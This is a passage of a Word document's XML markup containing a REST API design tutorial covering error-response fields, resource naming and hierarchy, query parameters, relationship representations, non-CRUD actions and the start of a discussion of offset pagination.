    <w:p w14:paraId="46C9A742" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "instance": "/transactions/abc123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122588E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "balance": 23.50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC27A9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "required": 100.00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307A63B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F93AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E16942" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  type: URI identifying error type (documentation link)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8FC3CB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  title: human-readable summary (doesn't change between occurrences)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29573324" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  status: HTTP status code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151B13D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  detail: specific explanation for this occurrence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06093DBE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  instance: URI identifying this specific occurrence (for debugging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B924790" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Extensions: additional problem-specific fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D0393A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REST API Design — The Deep Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40303EB6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource modeling — the hardest REST design problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E2A163" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32562191" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>The fundamental question: what are the resources?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D527FE8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5101C504" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rule 1: Resources are nouns, methods are verbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF00D35" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Bad:  POST /createOrder, GET /getUser, DELETE /deleteProduct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53379387" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Good: POST /orders, GET /users/{id}, DELETE /products/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162383C1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B823131" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP methods ARE the verbs — don't repeat them in URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA619D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0B3A1C75" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rule 2: Hierarchy reflects relationships (but only 2-3 levels deep)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6275C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /users/{userId}/orders             ← user's orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4CC210" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /users/{userId}/orders/{orderId}   ← specific order for user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD9BD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /users/{userId}/orders/{orderId}/items  ← items in that order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1000D0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFBFB83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Beyond 3 levels: fragile, hard to maintain, URL too long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ECA32A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Alternative: top-level collection with filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C3C2D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    GET /orders?user_id=123  ← equivalent, simpler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDD73D8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    GET /order-items?order_id=789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B21C14" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7BEC19B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rule 3: Use query parameters for filtering, sorting, pagination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA32B11" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  GET /products?category=electronics&amp;price_max=500&amp;sort=price&amp;order=asc&amp;page=2&amp;limit=20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7FDD3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0691488B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Not:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E98BB84" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET /products/electronics/price/max/500/sort/price/asc/page/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145E6137" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  (URL encodes state, hard to change, not cacheable meaningfully)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C43F8B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1AC672B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rule 4: Pluralize collection names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2AB6CF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /users not /user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B3FA1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /orders not /order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F1F5A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /products not /product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB279FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEC4E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Consistency: always plural for collections, always singular for items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D41A7A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    GET /users → collection of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58085DE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    GET /users/123 → specific user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54079833" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="4266AD3A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rule 5: Relationships between resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78105598" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Option A: embedded representation (denormalized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0AC05" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    GET /orders/789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C402C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB404B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "id": 789,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CE5956" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "user": {"id": 123, "name": "Alice"},  ← embedded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E45F4C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "items": [{"product_id": 456, "quantity": 2}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCC93DD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51851D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Pro: one request gets everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C7EE2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Con: stale if user data changes, large payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4C534F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4124C1CF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Option B: links/references (normalized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C004F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    GET /orders/789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514B5EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4694667E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "id": 789,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462CD35A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "user_id": 123,  ← reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B50CE5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "user_url": "/users/123",  ← HATEOAS link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBC87ED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "items_url": "/orders/789/items"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B78E06" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D070FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Pro: always current, smaller payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628BA0EE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Con: multiple requests needed for full data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9B071" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E29AB3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Option C: sparse fieldsets (client controls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155689E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    GET /orders/789?include=user,items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249B59F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6B656" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "id": 789,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261DF323" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "user": {"id": 123, "name": "Alice"},  ← included by request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66053CC9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "items": [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9D843" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA7C1A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Pro: client controls what it needs → no over/under fetching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A7AB5D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Con: server must implement inclusion logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965F849" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    This is JSON:API's approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F2D8C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3A72C5A6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rule 6: Actions that don't fit CRUD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60154140" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Resource-oriented action (preferred):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A752D30" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    PUT /orders/789/status → {status: "cancelled"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53445B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    POST /orders/789/cancellations → create a cancellation record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5172408F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27237E33" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Controller resource (RPC-style, when truly no resource):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD329C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    POST /payments/retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B5A78" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    POST /reports/generate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A9898" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    POST /cache/invalidate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCCC161" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13238EFE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Use sparingly: too many controller resources = REST pretending to be RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56315733" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pagination — the performance-critical design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB30D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BCB458" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Offset pagination (simple but problematic at scale):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F5575" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GET /orders?page=5&amp;limit=20  ← skip (5-1)*20=80 items, return 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E39E8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E03FF1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  SQL: SELECT * FROM orders ORDER BY id LIMIT 20 OFFSET 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B01BF0A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0ACF35" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBDF5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Deep pagination: OFFSET 100000 → database scans 100,020 rows, returns 20</w:t>
      </w:r>
    </w:p>
